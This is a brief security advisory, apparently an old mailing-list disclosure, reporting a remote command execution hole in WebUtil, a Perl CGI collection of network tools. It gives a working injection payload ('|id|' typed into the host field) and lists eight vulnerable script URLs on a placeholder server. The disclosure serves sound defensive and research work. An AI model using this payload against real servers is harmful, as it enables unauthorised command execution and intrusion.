Name   : remote command execution vulnerability
Problem: WebUtil - A collection of net commands by The
         Puppet Master. A hole can lead to command execution
         on remote server running this perl script.

Exploit:

Access this sites and type "|id|" in "Web Name or IP Address:"
form field.
                 http://server/cgi-bin/webutil.pl?ping
                 http://server/cgi-bin/webutil.pl?traceroute
                 http://server/cgi-bin/webutil.pl?whois
                 http://server/cgi-bin/webutil.pl?finger
                 http://server/cgi-bin/webutil.pl?nslookup
                 http://server/cgi-bin/webutil.pl?host
                 http://server/cgi-bin/webutil.pl?dnsquery
                 http://server/cgi-bin/webutil.pl?calendar

                                  Narrow (nss@privacyx.com)